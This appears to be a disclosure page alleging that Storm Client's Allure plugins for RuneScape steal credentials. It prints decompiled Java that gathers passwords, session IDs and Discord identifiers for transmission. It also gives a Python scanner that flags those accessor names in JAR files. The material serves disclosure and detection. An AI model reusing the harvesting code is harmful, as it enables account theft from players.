Storm Client
Last updated: 10/15/2025
CRITICAL VULNERABILITY

Storm Client & Allure Plugins Are Stealing Your RuneScape Account

I decompiled the Storm Client Allure plugins and found something bad. Really bad. These "premium" plugins that claim to turbocharge your RuneLite are actively stealing your username, password, session tokens, and Discord info, and sending everything to a remote server. If you've used ANY Allure plugin from storm-client.net, your account is compromised.

What they're stealing from you

Login credentials
Your username, password, character ID, and active session tokens. Everything needed to log into your account.

Discord info
Your Discord user ID and username, linking your gaming identity to your social accounts.

Game data
Your location, inventory, equipment, IP address, and everything you do in-game. Sent every 30 seconds.

Here's the proof

I decompiled the JAR files and found the malicious code. Below is the actual source code showing exactly how they're stealing your data. This isn't speculation - this is what the code actually does.

wHRCyGzrUO.java (lines 1388-1391)
This is where they grab your username and password directly from the game client:

object5 = Static.getWrappedClient().getUsername();
String string6 = Static.getClient().getCharacterId();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();

Complete data collection (lines 1388-1417)
They're not just taking credentials - they grab Discord info, IP address, location, everything:

object5 = Static.getWrappedClient().getUsername();
String string6 = Static.getClient().getCharacterId();
String string7 = Static.getClient().getPassword();
String string8 = Static.getClient().getSessionId();

try {
    wHRCyGzrUO wHRCyGzrUO4;
    wHRCyGzrUO3 = wHRCyGzrUO4;
    wHRCyGzrUO2 = wHRCyGzrUO4;
    string5 = string;
    l3 = l;
    n5 = Static.getClient().getWorld();
    n4 = iPlayer.getWorldLocation().getX();
    n3 = iPlayer.getWorldLocation().getY();
    n2 = iPlayer.getWorldLocation().getPlane();
    n = 0;
    string4 = iPlayer.getName();
    string3 = Client.getDiscordId();        // <-- Your Discord ID
    string2 = Client.getDiscordUser();      // <-- Your Discord username
    l2 = Client.getUserId();
    arrayList2 = arrayList4;
    arrayList = arrayList3;
    object3 = object7;
    object2 = object6;
    object = bl ? object5 : "";
}
catch (RuntimeException runtimeException) {
    throw wHRCyGzrUO.a(runtimeException);
}

wHRCyGzrUO3(string5, l3, n5, n4, n3, n2, n, string4, string3, 
    string2, l2, arrayList2, arrayList, (String)object3, 
    (ArrayList<mXyVQgtBKy>)object2, (String)object, 
    bl ? string7 : "",  // PASSWORD
    bl ? string6 : "",  // CHARACTER ID
    bl ? string8 : "",  // SESSION ID
    qDqmDoJJUU.KoiyzsDVIt());
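
To check other plugin JARs for the same accessor calls, here is an added triage example (not code from the decompiled plugin or from this page's author): a Python script that parses each class file's constant pool and lists the classes referencing the credential and Discord accessors shown above. The accessor names come from the snippet on this page; the function names and the sample JAR are constructed for illustration.

```python
import io, struct, zipfile

# Accessor names from the decompiled snippet on this page. Assumption: the calls
# are direct (not reflective), so each name is a CONSTANT_Utf8 pool entry.
INDICATORS = {"getPassword", "getSessionId", "getCharacterId",
              "getDiscordId", "getDiscordUser"}
# Payload size in bytes for each fixed-width constant-pool tag.
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def utf8_constants(data):
    """Return the set of CONSTANT_Utf8 strings in one .class file."""
    if len(data) < 10 or data[:4] != b"\xca\xfe\xba\xbe":
        return set()
    count = struct.unpack_from(">H", data, 8)[0]
    pos, idx, found = 10, 1, set()
    while idx < count and pos + 3 <= len(data):
        tag, pos = data[pos], pos + 1
        if tag == 1:  # Utf8: u2 length followed by the bytes
            n = struct.unpack_from(">H", data, pos)[0]
            found.add(data[pos + 2:pos + 2 + n].decode("utf-8", "replace"))
            pos += 2 + n
        elif tag in FIXED:
            pos += FIXED[tag]
            idx += 1 if tag in (5, 6) else 0  # long/double take two slots
        else:
            break  # unknown tag: stop rather than misparse
        idx += 1
    return found

def scan_jar(jar_bytes):
    """Map each .class entry to the sorted indicator names it references."""
    hits = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in jar.namelist():
            found = INDICATORS & utf8_constants(jar.read(name))
            if name.endswith(".class") and found:
                hits[name] = sorted(found)
    return hits

def sample_jar():
    """Constructed sample JAR: header-plus-Utf8-only stand-ins for classes."""
    def cls(names):
        pool = b"".join(b"\x01" + struct.pack(">H", len(n)) + n.encode() for n in names)
        return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, len(names) + 1) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("wHRCyGzrUO.class", cls(["getUsername", "getPassword", "getSessionId"]))
        jar.writestr("Benign.class", cls(["getWorld", "getWorldLocation"]))
    return buf.getvalue()
```

A hit only shows that a class references the accessor, so treat it as a reason to decompile and review that class. Reflective calls or encrypted strings would not appear in this listing.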

Visual proof

Screenshots showing the malicious code in action, the developer's response when confronted, and the decompiled source code structure.

In-game credential theft
The plugin literally tells you it's "Sending flagged credentials to Discord webhook" right in the game chat.
[Screenshot: RuneScape game screenshot showing red text in chat: 'Sending flagged credentials to Discord webhook']

Developer's response
When confronted about the credential theft, developer Burak responded with "I dont care" and told users to "Get a life".
[Screenshot: Discord chat showing developer Burak dismissively responding 'I dont care' when confronted about credential logging]

Decompiled data structure
The serialized data fields showing exactly what they collect: username, password, session IDs, Discord info, IP address, inventory, equipment.
[Screenshot: Decompiled Java code showing @SerializedName annotations for username, password, discord_id, ip_address, and other stolen data fields]

Obfuscated plugin structure
IntelliJ IDEA showing the decompiled Allure plugin with heavily obfuscated class names like "qVKsqsIUaY" and "tyOlAsANcv" to hide malicious intent.
[Screenshot: IntelliJ IDEA screenshot showing decompiled Allure plugin structure with obfuscated class names and methods]

Developer deflecting accusations
Another Discord conversation where Burak deflects when confronted about using cracked plugins, claiming he does code reviews and asking "Why not just pay the developer instead?"
[Screenshot: Discord conversation showing Burak deflecting accusations about cracked plugins]